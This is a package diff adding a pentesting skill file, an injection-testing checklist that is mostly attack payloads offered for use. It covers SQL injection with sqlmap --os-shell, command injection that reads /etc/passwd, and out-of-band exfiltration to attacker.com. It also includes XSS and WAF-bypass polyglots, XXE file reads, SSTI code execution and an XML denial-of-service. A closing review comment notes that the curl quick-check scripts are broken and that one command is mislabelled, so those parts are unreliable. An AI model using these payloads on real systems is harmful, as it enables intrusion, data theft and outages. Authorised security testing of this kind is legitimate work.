@soulofzephir/pi-skill-pentesting 1.0.0

@@ -0,0 +1,456 @@
1
+ # Injection Testing Checklist
2
+
3
+ ## 🚨 Types of Injection
4
+
5
+ | Type | Target | Risk |
6
+ |------|--------|------|
7
+ | SQL Injection | Database | Critical |
8
+ | XSS | Users/Browser | High |
9
+ | Command Injection | OS/Server | Critical |
10
+ | LDAP Injection | Directory | High |
11
+ | XML/XXE | XML Parser | High |
12
+ | XPath Injection | XML Data | Medium |
13
+ | IMAP Injection | Email Server | Medium |
14
+ | ORM Injection | Framework | High |
15
+ | Template Injection | Template Engine | Critical |
16
+ | SSTI | Server Template | Critical |
17
+
18
+ ---
19
+
20
+ ## 💉 SQL Injection (SQLi)
21
+
22
+ ### Types to Test
23
+ - [ ] In-Band SQLi (Union-based)
24
+ - [ ] Blind Boolean-based SQLi
25
+ - [ ] Time-based Blind SQLi
26
+ - [ ] Out-of-Band SQLi
27
+ - [ ] Error-based SQLi
28
+
29
+ ### Common Injection Points
30
+ ```
31
+ URL parameters: /product?id=1' OR '1'='1
32
+ POST body: username=' OR 1=1--
33
+ Headers: Cookie: id=1'
34
+ Search: q=test' UNION SELECT...
35
+ API params: /api/users?id=1
36
+ File params: avatar=' OR 1=1--
37
+ ```
38
+
39
+ ### Test Payloads
40
+
41
+ **Basic Detection:**
42
+ ```
43
+ '
44
+ "
45
+ `
46
+ )
47
+ ))
48
+ OR 1=1
49
+ OR '1'='1
50
+ OR 1=1--
51
+ OR 1=1#
52
+ OR '1'='1'--
53
+ ```
54
+
55
+ **Union-Based:**
56
+ ```
57
+ ' UNION SELECT NULL--
58
+ ' UNION SELECT NULL,NULL--
59
+ ' UNION SELECT NULL,NULL,NULL--
60
+ ' UNION SELECT 1--
61
+ ' UNION SELECT 1,2,3--
62
+ ' UNION SELECT NULL,NULL FROM dual--
63
+ ```
64
+
65
+ **Stacking:**
66
+ ```
67
+ '; SELECT SLEEP(5);--
68
+ '; WAITFOR DELAY '0:0:5';--
69
+ ```
70
+
71
+ **Blind Boolean:**
72
+ ```
73
+ ' AND 1=1--
74
+ ' AND 1=2--
75
+ ' AND 'x'='x
76
+ ' AND 'x'='y
77
+ ' OR (SELECT COUNT(*) FROM users)>0--
78
+ ```
79
+
80
+ **Time-Based:**
81
+ ```
82
+ '; IF(1=1) WAITFOR DELAY '0:0:5'--
83
+ '; SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END--
84
+ '; pg_sleep(5)--
85
+ '; BENCHMARK(5000000,MD5('A'))--
86
+ ```
87
+
88
+ ### Auto Tools
89
+ ```bash
90
+ # SQLMap basic
91
+ sqlmap -u "http://target.com/product?id=1" --batch
92
+
93
+ # SQLMap with POST
94
+ sqlmap -u "http://target.com/login" --data="username=admin&password=test"
95
+
96
+ # SQLMap with cookies
97
+ sqlmap -u "http://target.com/profile" --cookie="PHPSESSID=abc123"
98
+
99
+ # SQLMap full enumeration
100
+ sqlmap -u "http://target.com" --batch --level=5 --risk=3 --dbs
101
+
102
+ # SQLMap shell
103
+ sqlmap -u "http://target.com" --batch --os-shell
104
+ ```
105
+
106
+ ---
107
+
108
+ ## 🖥️ Command Injection
109
+
110
+ ### Test Payloads
111
+
112
+ **Linux:**
113
+ ```bash
114
+ ; whoami
115
+ ; ls -la /
116
+ ; cat /etc/passwd
117
+ ; id
118
+ ; pwd
119
+ ; uname -a
120
+ | whoami
121
+ | cat /etc/passwd
122
+ && whoami
123
+ `whoami`
124
+ $(whoami)
125
+ ${IFS}cat${IFS}/etc/passwd
126
+ || whoami
127
+ ; ping -c 3 127.0.0.1
128
+ ```
129
+
130
+ **Windows:**
131
+ ```cmd
132
+ ; whoami
133
+ ; dir c:\
134
+ ; type c:\windows\win.ini
135
+ | whoami
136
+ & whoami
137
+ && whoami
138
+ || whoami
139
+ `whoami`
140
+ ```
141
+
142
+ **Blind Command Injection:**
143
+ ```bash
144
+ # Linux - time-based
145
+ ; sleep 5
146
+ | sleep 5
147
+ && sleep 5
148
+ || sleep 5
149
+
150
+ # Linux - out-of-band
151
+ ; nslookup $(whoami).attacker.com
152
+ ; curl http://attacker.com/$(whoami)
153
+
154
+ # Windows - time-based
155
+ ; ping -n 5 127.0.0.1
156
+ ```
157
+
158
+ ### Common Injection Points
159
+ ```
160
+ Search: ?q=test;ls
161
+ Ping: ?host=127.0.0.1;cat /etc/passwd
162
+ DNS: ?domain=example.com;id
163
+ Email: ?to=test@x.com|id
164
+ File: ?file=report.pdf;whoami
165
+ URL: /redirect?url=http://evil.com
166
+ ```
167
+
168
+ ### Auto Tools
169
+ ```bash
170
+ # Commix
171
+ commix -u "http://target.com/ping?ip=127.0.0.1"
172
+
173
+ # SQLMap command injection mode
174
+ sqlmap -u "http://target.com" --os-cmd="whoami"
175
+
176
+ # Manual
177
+ # Try: 127.0.0.1;ls
178
+ # Try: 127.0.0.1|ls
179
+ # Try: 127.0.0.1&&ls
180
+ # Try: 127.0.0.1`ls`
181
+ # Try: 127.0.0.1$(ls)
182
+ ```
183
+
184
+ ---
185
+
186
+ ## 🐙 XSS (Cross-Site Scripting)
187
+
188
+ ### Types
189
+ - [ ] Reflected XSS
190
+ - [ ] Stored/Persistent XSS
191
+ - [ ] DOM-based XSS
192
+ - [ ] Self-XSS
193
+ - [ ] Blind XSS (PolyChain)
194
+
195
+ ### Test Payloads
196
+
197
+ **Basic:**
198
+ ```html
199
+ <script>alert(1)</script>
200
+ <img src=x onerror=alert(1)>
201
+ <svg onload=alert(1)>
202
+ <body onload=alert(1)>
203
+ <input onfocus=alert(1) autofocus>
204
+ <select onfocus=alert(1) autofocus>
205
+ <iframe src="javascript:alert(1)">
206
+ <video><source onerror="alert(1)">
207
+ <audio src=x onerror=alert(1)>
208
+ <details open ontoggle=alert(1)>
209
+ <marquee onstart=alert(1)>
210
+ ```
211
+
212
+ **Event Handlers:**
213
+ ```html
214
+ onload, onerror, onclick
215
+ onmouseover, onmouseout
216
+ onfocus, onblur
217
+ onchange, onsubmit
218
+ onkeydown, onkeyup, onkeypress
219
+ ondblclick, ondrag
220
+ ```
221
+
222
+ **WAF Bypass:**
223
+ ```html
224
+ <SCRIPT>alert(1)</SCRIPT>
225
+ <scrIPT>alert(1)</scrIPT>
226
+ <ScRiPt>alert(1)</sCrIpT>
227
+ <img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
228
+ <svg><script>alert(1)</script></svg>
229
+ <svg><g/onload=alert(1)>
230
+ <svg><script>eval('alert(1)')</script></svg>
231
+ <iframe src="javasc&#114;ipt:alert(1)">
232
+ <img src=x:alert(1)>
233
+ <object data="data:text/html,<script>alert(1)</script>">
234
+ ```
235
+
236
+ **Polyglots:**
237
+ ```html
238
+ jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
239
+ --></title></textarea></style></script></xmp>><svg/onload=alert(1)//
240
+ '">><marquee><img src=x onerror=alert(1)>
241
+ ```
242
+
243
+ **DOM XSS:**
244
+ ```javascript
245
+ location.href="javascript:alert(1)"
246
+ document.write("<img src=x onerror=alert(1)>")
247
+ eval("alert(1)")
248
+ setTimeout("alert(1)")
249
+ setInterval("alert(1)")
250
+ innerHTML="<img src=x onerror=alert(1)>"
251
+ ```
252
+
253
+ ### Common Injection Points
254
+ ```
255
+ URL params: /search?q=<script>
256
+ Form input: name=<script>
257
+ Comment: <img src=x onerror=>
258
+ Profile: bio=<svg onload=>
259
+ Chat: message=<script>
260
+ Email: subject=<script>
261
+ ```
262
+
263
+ ### Auto Tools
264
+ ```bash
265
+ # Dalfox (XSS scanner)
266
+ dalfox url "http://target.com/search?q=test"
267
+
268
+ # XSStrike
269
+ xsstrike -u "http://target.com/?q=test"
270
+
271
+ # Nuclei XSS templates
272
+ nmap --script=http-unsafe-output-escaping,http-cross-site-scripting target.com
273
+
274
+ # Manual browser testing required for DOM XSS
275
+ ```
276
+
277
+ ---
278
+
279
+ ## 📁 LDAP Injection
280
+
281
+ ### Test Payloads
282
+ ```
283
+ *)(objectClass=*
284
+ )(objectClass=*
285
+ *)(objectClass=*
286
+ admin)(&(password=*)
287
+ *)(|
288
+ )(CN=Admin)
289
+ *()
290
+ ```
291
+
292
+ ### Common Points
293
+ ```
294
+ Login: username=admin*)(&
295
+ Search: ?search=admin*
296
+ ```
297
+
298
+ ---
299
+
300
+ ## 📄 XML/XXE Injection
301
+
302
+ ### Test Payloads
303
+
304
+ **Basic XXE:**
305
+ ```xml
306
+ <?xml version="1.0"?>
307
+ <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
308
+ <foo>&xxe;</foo>
309
+ ```
310
+
311
+ **Blind XXE:**
312
+ ```xml
313
+ <?xml version="1.0"?>
314
+ <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">]>
315
+ <foo>&xxe;</foo>
316
+
317
+ <!-- evil.dtd on attacker.com -->
318
+ <!ENTITY xxe SYSTEM "file:///etc/passwd">
319
+ ```
320
+
321
+ **Billion Laughs (DoS):**
322
+ ```xml
323
+ <!DOCTYPE lolz [
324
+ <!ENTITY lol "lol">
325
+ <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
326
+ <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
327
+ ]>
328
+ <lolz>&lol3;</lolz>
329
+ ```
330
+
331
+ ### Common Points
332
+ ```
333
+ XML API: /api/import
334
+ SOAP API: /soap
335
+ PDF upload
336
+ Office docs upload
337
+ RSS feed
338
+ ```
339
+
340
+ ---
341
+
342
+ ## 🔍 XPath Injection
343
+
344
+ ### Test Payloads
345
+ ```
346
+ ' or '1'='1
347
+ ' or ''='
348
+ admin' or '1'='1
349
+ admin' or ''='
350
+ ' or count(/*) > 0
351
+ ' or count(/child::node()) > 0
352
+ ```
353
+
354
+ ---
355
+
356
+ ## 🗂️ Template Injection (SSTI)
357
+
358
+ ### Jinja2 (Python)
359
+ ```python
360
+ {{7*7}}
361
+ {{config}}
362
+ {{config.items()}}
363
+ {{''.__class__.__mro__[1].__subclasses__()}}
364
+ {{lipsum.__globals__.__builtins__}}
365
+ {{cycler.__init__.__globals__.os.system('id')}}
366
+ ```
367
+
368
+ ### Twig (PHP)
369
+ ```php
370
+ {{7*7}}
371
+ {{_self.env.setCache("blabla")}}
372
+ {{_self.env.getLoader().getPaths()}}
373
+ {{_self.env.getLoader().getPaths()|escape}}
374
+ ```
375
+
376
+ ### Handlebars (Node.js)
377
+ ```javascript
378
+ {{#with "a"}}{{#with "b"}}{{#with "c"}}{{#with "d"}}{{#with (eval "require('child_process').execSync('id')")}}{{this}}{{/with}}{{/with}}{{/with}}{{/with}}{{/with}}
379
+ ```
380
+
381
+ ---
382
+
383
+ ## 📧 IMAP/SMTP Injection
384
+
385
+ ### Test Payloads
386
+ ```
387
+ user@domain.com%0ACc:attacker@evil.com
388
+ user@domain.com%0ATo:attacker@evil.com
389
+ user@domain.com%0ASubject:Phishing
390
+ user@domain.com\r\n\r\nPhishing body
391
+ ```
392
+
393
+ ---
394
+
395
+ ## 🛡️ Injection Prevention Checklist
396
+
397
+ - [ ] Input validation (whitelist)
398
+ - [ ] Parameterized queries (prepared statements)
399
+ - [ ] Output encoding/escaping
400
+ - [ ] Content Security Policy
401
+ - [ ] ORM usage (not raw SQL)
402
+ - [ ] No eval() on user input
403
+ - [ ] XML parser secure config
404
+ - [ ] Command execution sandboxed
405
+ - [ ] WAF rules for common payloads
406
+ - [ ] Regular security testing
407
+
408
+ ---
409
+
410
+ ## ⚡ Quick Test Scripts
411
+
412
+ ### SQLi Quick Check
413
+ ```bash
414
+ #!/bin/bash
415
+ TARGET=$1
416
+ echo "Testing SQLi on: $TARGET"
417
+
418
+ # Basic test
419
+ PAYLOADS=("'" "' OR '1'='1" "' OR 1=1--" "' UNION SELECT NULL--")
420
+
421
+ for p in "${PAYLOADS[@]}"; do
422
+ RESPONSE=$(curl -s "${TARGET}${p}" | grep -iE "sql|syntax|mysql|postgresql|error|warning|mysql_fetch")
423
+ if [ ! -z "$RESPONSE" ]; then
424
+ echo "⚠️ VULNERABLE with payload: $p"
425
+ echo " Response: $RESPONSE"
426
+ fi
427
+ done
428
+ ```
429
+
430
+ ### XSS Quick Check
431
+ ```bash
432
+ #!/bin/bash
433
+ TARGET=$1
434
+ PAYLOAD="<script>alert('XSS')</script>"
435
+
436
+ echo "Testing XSS on: $TARGET"
437
+ curl -s "${TARGET}${PAYLOAD}" | grep -q "alert" && echo "⚠️ Reflected XSS possible"
438
+
439
+ # Also test with different encoding
440
+ PAYLOAD2="<img src=x onerror=alert(1)>"
441
+ curl -s "${TARGET}${PAYLOAD2}" | grep -q "alert" && echo "⚠️ Event handler XSS"
442
+ ```
443
+
444
+ ---
445
+
446
+ ## 📊 Injection Risk Matrix
447
+
448
+ | Type | Difficulty to Exploit | Impact | Prevalence |
449
+ |------|----------------------|--------|------------|
450
+ | SQLi | Medium | Critical | Common |
451
+ | Command Injection | Easy | Critical | Common |
452
+ | XSS | Easy | High | Very Common |
453
+ | XXE | Medium | High | Common |
454
+ | LDAP Injection | Medium | High | Less Common |
455
+ | SSTI | Medium | Critical | Less Common |
456
+ | XPath | Medium | Medium | Less Common |
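Review bot: both scripts under "Quick Test Scripts" produce malformed requests and false positives as written. In `SQLi Quick Check` the payloads contain spaces and quotes but are appended raw to the URL (`curl -s "${TARGET}${p}"`), so most servers reject the request with 400 before any parameter is parsed; pass the value with `curl -sG --data-urlencode "id=${p}"` (or whatever the parameter is called) instead. The grep pattern `sql|syntax|mysql|postgresql|error|warning|mysql_fetch` also matches ordinary page text, so "VULNERABLE" should be decided by comparing against a baseline response rather than by keyword presence; `[ ! -z "$RESPONSE" ]` can be `[ -n "$RESPONSE" ]`. In `XSS Quick Check`, `grep -q "alert"` fires even when the payload is reflected HTML-encoded (`&lt;script&gt;alert`), which is the safe case, so the check should look for the unencoded `<script>` or `onerror=` string. Smaller points in the same file: the comment `# Nuclei XSS templates` sits above an `nmap --script=...` command, so either the comment or the command is wrong; the "Types of Injection" table lists "Template Injection" and "SSTI" as two rows for the same class; the LDAP payload block repeats `*)(objectClass=*`; "Blind XSS (PolyChain)" looks like a typo and should be checked; and the `--level=5 --risk=3` and `--os-shell` sqlmap lines carry no note that risk 3 enables OR-based payloads that can modify data, which a checklist shipped as a skill should document next to the command.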